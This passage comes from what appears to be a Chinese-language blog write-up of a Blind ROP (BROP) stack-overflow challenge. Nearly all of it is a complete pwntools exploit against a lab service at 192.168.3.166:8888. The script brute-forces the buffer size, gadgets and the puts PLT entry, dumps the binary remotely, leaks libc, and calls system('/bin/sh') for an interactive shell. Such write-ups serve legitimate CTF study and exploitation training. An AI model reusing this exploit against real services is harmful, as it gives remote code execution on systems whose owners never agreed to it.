class="number">0x400000</span>,</span></span><br><span class="line"><span class="params">    end_addr=<span class="number">0x401000</span>,</span></span><br><span class="line"><span class="params"></span>):</span><br><span class="line">    pop_rdi_ret = useful_gadget + <span class="number">0x9</span></span><br><span class="line">    result = <span class="string">b&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> start_addr &lt; end_addr:</span><br><span class="line">        time.sleep(<span class="number">0.5</span>)</span><br><span class="line">        payload = (</span><br><span class="line">            <span class="string">b&quot;a&quot;</span> * buf_size</span><br><span class="line">            + p64(pop_rdi_ret)</span><br><span class="line">            + p64(start_addr)</span><br><span class="line">            + p64(puts_plt)</span><br><span class="line">            + p64(stop_gadget)</span><br><span class="line">        )</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp1 = p.recv(timeout=<span class="number">0.5</span>)</span><br><span class="line">            <span class="comment"># log.info(&quot;[++++]leaking: 0x%x --&gt; %s&quot; % (start_addr, (resp or b&quot;&quot;).hex()))</span></span><br><span class="line">            <span class="comment"># if start_addr == 0x40003E:  # and start_addr&lt;=0x40003b:</span></span><br><span class="line">            <span class="comment">#    log.info(</span></span><br><span class="line">            <span class="comment">#        &quot;[++++]leaking: 0x%x --&gt; %s&quot; % (start_addr, (resp1 or b&quot;&quot;).hex())</span></span><br><span class="line">            <span class="comment">#    )</span></span><br><span class="line">            <span class="comment">#    exit()</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp1 == <span class="string">b&quot;\n&quot;</span>:</span><br><span class="line">                resp = <span class="string">b&quot;\x00&quot;</span></span><br><span class="line">            <span class="keyword">elif</span> resp1[-<span class="number">1</span>:] == <span class="string">b&quot;\n&quot;</span>:</span><br><span class="line">                log.info(</span><br><span class="line">                    <span class="string">&quot;[++++]leaking: 0x%x --&gt; %s&quot;</span> % (start_addr, (resp <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>())</span><br><span class="line">                )</span><br><span class="line">                resp = resp1[:-<span class="number">1</span>] + <span class="string">b&quot;\x00&quot;</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                resp = resp1</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp != resp1:</span><br><span class="line">                log.info(</span><br><span class="line">                    <span class="string">&quot;[change]resp1: 0x%x: %s --&gt; resp1: 0x%x: %s&quot;</span></span><br><span class="line">                    % (</span><br><span class="line">                        start_addr,</span><br><span class="line">                        (resp1 <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>(),</span><br><span class="line">                        start_addr,</span><br><span class="line">                        (resp <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>(),</span><br><span class="line">                    )</span><br><span class="line">                )</span><br><span class="line"></span><br><span class="line">            log.info(<span class="string">&quot;leaking: 0x%x --&gt; %s&quot;</span> % (start_addr, (resp <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>()))</span><br><span class="line">            result += resp</span><br><span class="line">            start_addr += <span class="built_in">len</span>(resp)</span><br><span class="line">            p.close()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(e)</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            start_addr -= <span class="number">1</span></span><br><span class="line">    <span class="keyword">return</span> result</span><br></pre></td></tr></table></figure>

<img     src="/pic/BROP.assets/image-20240201002736499.png"   alt="image-20240201002736499" >

<p>在我缓慢的虚拟机上要等差不多十五分钟。</p>
<p>先跑着吧，感觉比赛的靶机经不起这么连呢…</p>
<img     src="/pic/BROP.assets/image-20240201012324951.png"   alt="image-20240201012324951" style="zoom:67%;" >

<p>可以使用上面这个工具，但是不知道这次打开为什么是invalid</p>
<p>所以换成ida了</p>
<p>打开binary模式，edit-&gt;segments-&gt;rebase program 将程序的基地址改为 0x400000，然后找到偏移0x555</p>
<img     src="/pic/BROP.assets/image-20240201140720823.png"   alt="image-20240201140720823" style="zoom:67%;" >

<p>看push 0 前面的那个地址0x601018，大概率就是puts的got地址了</p>
<h4 id="7-泄露libc"><a href="#7-泄露libc" class="headerlink" title="7.泄露libc"></a>7.泄露libc</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">puts_got = <span class="number">0x601018</span></span><br><span class="line">p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">payload = (</span><br><span class="line">    <span class="string">b&quot;a&quot;</span> * buf_size + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)</span><br><span class="line">)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">puts_real_addr = u64(p.recvline()[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;puts_real_addr: 0x%x&quot;</span> % puts_real_addr)</span><br></pre></td></tr></table></figure>

<img     src="/pic/BROP.assets/image-20240201142012247.png"   alt="image-20240201142012247" style="zoom:67%;" >

<h4 id="8-利用"><a href="#8-利用" class="headerlink" title="8.利用"></a>8.利用</h4><p>又遇到了栈对齐</p>
<p>前面的<code>pop rdi;ret</code>的字节码是5f3c，起始地址是useful+9，那么ret的地址就是userful+10</p>
<p>完整exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> struct <span class="keyword">import</span> pack</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_buf_size</span>():</span><br><span class="line">    i = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.send(i * <span class="string">&quot;a&quot;</span>)  <span class="comment"># donot sendline</span></span><br><span class="line">            output = p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">not</span> output.startswith(<span class="string">b&quot;No password&quot;</span>):</span><br><span class="line">                <span class="keyword">return</span> i - <span class="number">1</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                log.info(<span class="string">&quot;%d is not enough&quot;</span> % i)</span><br><span class="line">                i += <span class="number">1</span></span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            p.close()</span><br><span class="line">            i -= <span class="number">1</span></span><br><span class="line">            log.info(<span class="string">&quot;buf_size is %d&quot;</span> % i)</span><br><span class="line">            <span class="keyword">return</span> i</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_stop_addr</span>(<span class="params">buf_size, start_addr=<span class="number">0x4006C0</span></span>):  <span class="comment"># 32bit:0x08048000</span></span><br><span class="line">    stop_addr = start_addr</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(stop_addr)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(<span class="string">&quot;one success addr: 0x%x&quot;</span> % stop_addr)</span><br><span class="line">            <span class="keyword">return</span> stop_addr</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;one fail addr: 0x%x&quot;</span> % stop_addr)</span><br><span class="line">            stop_addr += <span class="number">1</span></span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            stop_addr -= <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_main_addr</span>(<span class="params">buf_size, start_addr=<span class="number">0x4006B0</span></span>):</span><br><span class="line">    main_addr = start_addr</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        main_addr += <span class="number">1</span></span><br><span class="line">        payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(main_addr)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp = p.recv()</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(</span><br><span class="line">                <span class="string">&quot;find one stop gadget: 0x%x ------------------------------------&quot;</span></span><br><span class="line">                % main_addr</span><br><span class="line">            )</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp.startswith(<span class="string">b&quot;WelCome&quot;</span>):</span><br><span class="line">                log.info(<span class="string">&quot;find main addr: 0x%x&quot;</span> % main_addr)</span><br><span class="line">                <span class="keyword">return</span> main_addr</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;one fail addr: 0x%x&quot;</span> % main_addr)</span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            main_addr -= <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_useful_gadget</span>(<span class="params">buf_size, stop_gadget, main_addr, start_addr=<span class="number">0x4007B0</span></span>):</span><br><span class="line">    useful_gadget = start_addr</span><br><span class="line">    stop_gadget = stop_gadget</span><br><span class="line">    main_addr = main_addr</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        time.sleep(<span class="number">0.5</span>)</span><br><span class="line">        useful_gadget += <span class="number">1</span></span><br><span class="line">        payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(useful_gadget) + p64(<span class="number">1</span>) * <span class="number">6</span> + p64(main_addr)</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp = p.recv(timeout=<span class="number">0.5</span>)</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(</span><br><span class="line">                <span class="string">&quot;find one stop gadget: 0x%x ------------------------------------&quot;</span></span><br><span class="line">                % useful_gadget</span><br><span class="line">            )</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp.startswith(<span class="string">b&quot;WelCome&quot;</span>):</span><br><span class="line">                <span class="keyword">try</span>:</span><br><span class="line">                    payload = <span class="string">b&quot;a&quot;</span> * buf_size + p64(useful_gadget) + p64(<span class="number">1</span>) * <span class="number">6</span></span><br><span class="line">                    p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">                    p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">                    p.sendline(payload)</span><br><span class="line">                    resp = p.recv()</span><br><span class="line">                    p.close()</span><br><span class="line">                <span class="keyword">except</span> EOFError:</span><br><span class="line">                    log.info(<span class="string">&quot;one useful addr: 0x%x&quot;</span> % useful_gadget)</span><br><span class="line">                    p.close()</span><br><span class="line">                    <span class="keyword">return</span> useful_gadget</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;not 0x%x&quot;</span> % useful_gadget)</span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            useful_gadget -= <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_puts_plt</span>(<span class="params">buf_size, stop_gadget, main_addr, useful_gadget, start_addr=<span class="number">0x400540</span></span>):</span><br><span class="line">    pop_rdi_ret = useful_gadget + <span class="number">0x9</span></span><br><span class="line">    elf_magic_addr = <span class="number">0x400000</span></span><br><span class="line">    puts_plt = start_addr</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        time.sleep(<span class="number">0.5</span>)</span><br><span class="line">        puts_plt += <span class="number">1</span></span><br><span class="line">        payload = (</span><br><span class="line">            <span class="string">b&quot;a&quot;</span> * buf_size</span><br><span class="line">            + p64(pop_rdi_ret)</span><br><span class="line">            + p64(elf_magic_addr)</span><br><span class="line">            + p64(puts_plt)</span><br><span class="line">            + p64(main_addr)</span><br><span class="line">        )</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp1 = p.recvline(timeout=<span class="number">0.5</span>)</span><br><span class="line">            resp2 = p.recvline(timeout=<span class="number">0.5</span>)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp1.startswith(<span class="string">b&quot;\x7fELF&quot;</span>) <span class="keyword">and</span> resp2.startswith(<span class="string">b&quot;WelCome&quot;</span>):</span><br><span class="line">                p.close()</span><br><span class="line">                log.info(<span class="string">&quot;puts_plt: 0x%x&quot;</span> % puts_plt)</span><br><span class="line">                <span class="keyword">return</span> puts_plt</span><br><span class="line">            p.close()</span><br><span class="line">            log.info(</span><br><span class="line">                <span class="string">&quot;find one stop gadget: 0x%x ------------------------------------&quot;</span></span><br><span class="line">                % puts_plt</span><br><span class="line">            )</span><br><span class="line">        <span class="keyword">except</span> EOFError:</span><br><span class="line">            log.info(<span class="string">&quot;not 0x%x&quot;</span> % puts_plt)</span><br><span class="line">            p.close()</span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">            puts_plt -= <span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">dump_memory</span>(<span class="params"></span></span><br><span class="line"><span class="params">    buf_size,</span></span><br><span class="line"><span class="params">    stop_gadget,</span></span><br><span class="line"><span class="params">    main_addr,</span></span><br><span class="line"><span class="params">    useful_gadget,</span></span><br><span class="line"><span class="params">    puts_plt,</span></span><br><span class="line"><span class="params">    start_addr=<span class="number">0x400000</span>,</span></span><br><span class="line"><span class="params">    end_addr=<span class="number">0x401000</span>,</span></span><br><span class="line"><span class="params"></span>):</span><br><span class="line">    pop_rdi_ret = useful_gadget + <span class="number">0x9</span></span><br><span class="line">    result = <span class="string">b&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> start_addr &lt; end_addr:</span><br><span class="line">        time.sleep(<span class="number">0.5</span>)</span><br><span class="line">        payload = (</span><br><span class="line">            <span class="string">b&quot;a&quot;</span> * buf_size</span><br><span class="line">            + p64(pop_rdi_ret)</span><br><span class="line">            + p64(start_addr)</span><br><span class="line">            + p64(puts_plt)</span><br><span class="line">            + p64(stop_gadget)</span><br><span class="line">        )</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line">            p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">            p.sendline(payload)</span><br><span class="line">            resp1 = p.recv(timeout=<span class="number">0.5</span>)</span><br><span class="line">            <span class="comment"># log.info(&quot;[++++]leaking: 0x%x --&gt; %s&quot; % (start_addr, (resp or b&quot;&quot;).hex()))</span></span><br><span class="line">            <span class="comment"># if start_addr == 0x40003E:  # and start_addr&lt;=0x40003b:</span></span><br><span class="line">            <span class="comment">#    log.info(</span></span><br><span class="line">            <span class="comment">#        &quot;[++++]leaking: 0x%x --&gt; %s&quot; % (start_addr, (resp1 or b&quot;&quot;).hex())</span></span><br><span class="line">            <span class="comment">#    )</span></span><br><span class="line">            <span class="comment">#    exit()</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp1 == <span class="string">b&quot;\n&quot;</span>:</span><br><span class="line">                resp = <span class="string">b&quot;\x00&quot;</span></span><br><span class="line">            <span class="keyword">elif</span> resp1[-<span class="number">1</span>:] == <span class="string">b&quot;\n&quot;</span>:</span><br><span class="line">                log.info(</span><br><span class="line">                    <span class="string">&quot;[++++]leaking: 0x%x --&gt; %s&quot;</span> % (start_addr, (resp <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>())</span><br><span class="line">                )</span><br><span class="line">                resp = resp1[:-<span class="number">1</span>] + <span class="string">b&quot;\x00&quot;</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                resp = resp1</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> resp != resp1:</span><br><span class="line">                log.info(</span><br><span class="line">                    <span class="string">&quot;[change]resp1: 0x%x: %s --&gt; resp1: 0x%x: %s&quot;</span></span><br><span class="line">                    % (</span><br><span class="line">                        start_addr,</span><br><span class="line">                        (resp1 <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>(),</span><br><span class="line">                        start_addr,</span><br><span class="line">                        (resp <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>(),</span><br><span class="line">                    )</span><br><span class="line">                )</span><br><span class="line"></span><br><span class="line">            log.info(<span class="string">&quot;leaking: 0x%x --&gt; %s&quot;</span> % (start_addr, (resp <span class="keyword">or</span> <span class="string">b&quot;&quot;</span>).<span class="built_in">hex</span>()))</span><br><span class="line">            result += resp</span><br><span class="line">            start_addr += <span class="built_in">len</span>(resp)</span><br><span class="line">            p.close()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">            <span class="built_in">print</span>(e)</span><br><span class="line">            log.info(<span class="string">&quot;connect error&quot;</span>)</span><br><span class="line">    <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">context(log_level=<span class="string">&quot;debug&quot;</span>, os=<span class="string">&quot;linux&quot;</span>, arch=<span class="string">&quot;amd64&quot;</span>)</span><br><span class="line"><span class="comment"># get_buf_size()</span></span><br><span class="line">buf_size = <span class="number">72</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># get_stop_addr(buf_size)</span></span><br><span class="line">stop_gadget = <span class="number">0x4006CE</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># get_main_addr(buf_size)</span></span><br><span class="line">main_addr = <span class="number">0x4006B6</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># get_useful_gadget(buf_size, stop_gadget, main_addr)</span></span><br><span class="line">useful_gadget = <span class="number">0x4007BA</span></span><br><span class="line">pop_rdi_ret = useful_gadget + <span class="number">0x9</span></span><br><span class="line"><span class="comment"># get_puts_plt(buf_size, stop_gadget, main_addr, useful_gadget)</span></span><br><span class="line">puts_plt = <span class="number">0x400555</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># code_bin = dump_memory(</span></span><br><span class="line"><span class="comment">#     buf_size,</span></span><br><span class="line"><span class="comment">#     stop_gadget,</span></span><br><span class="line"><span class="comment">#     main_addr,</span></span><br><span class="line"><span class="comment">#     useful_gadget,</span></span><br><span class="line"><span class="comment">#     puts_plt,</span></span><br><span class="line"><span class="comment"># )</span></span><br><span class="line"><span class="comment"># with open(&quot;/home/cake/Documents/pwn/wiki/medium_rop/3code.dump&quot;, &quot;wb&quot;) as f:</span></span><br><span class="line"><span class="comment">#     f.write(code_bin)</span></span><br><span class="line"></span><br><span class="line">puts_got = <span class="number">0x601018</span></span><br><span class="line">p = remote(<span class="string">&quot;192.168.3.166&quot;</span>, <span class="number">8888</span>)</span><br><span class="line"><span class="comment"># -----leak real puts-----</span></span><br><span class="line">p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">payload = (</span><br><span class="line">    <span class="string">b&quot;a&quot;</span> * buf_size + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)</span><br><span class="line">)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">puts_real_addr = u64(p.recvline()[:-<span class="number">1</span>].ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;puts_real_addr: 0x%x&quot;</span> % puts_real_addr)</span><br><span class="line"><span class="comment"># -----leak libc</span></span><br><span class="line"><span class="comment"># puts_real_addr = 0x7F2A09ED5E50</span></span><br><span class="line">libc = LibcSearcher(<span class="string">&quot;puts&quot;</span>, puts_real_addr)</span><br><span class="line">libc_base = puts_real_addr - libc.dump(<span class="string">&quot;puts&quot;</span>)</span><br><span class="line">system_addr = libc_base + libc.dump(<span class="string">&quot;system&quot;</span>)</span><br><span class="line">binsh_addr = libc_base + libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;system_addr: 0x%x&quot;</span> % system_addr)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;binsh_addr: 0x%x&quot;</span> % binsh_addr)</span><br><span class="line">payload = (</span><br><span class="line">    <span class="string">b&quot;a&quot;</span> * buf_size</span><br><span class="line">    + p64(useful_gadget + <span class="number">10</span>)</span><br><span class="line">    + p64(pop_rdi_ret)</span><br><span class="line">    + p64(binsh_addr)</span><br><span class="line">    + p64(system_addr)</span><br><span class="line">    + p64(stop_gadget)</span><br><span class="line">)</span><br><span class="line">p.recvuntil(<span class="string">b&quot;WelCome my friend,Do you know password?\n&quot;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>参考：</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1965871" >https://cloud.tencent.com/developer/article/1965871<i class="fas fa-external-link-alt"></i></a> (写得比wiki详细,清楚非常非常多)</p>

                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
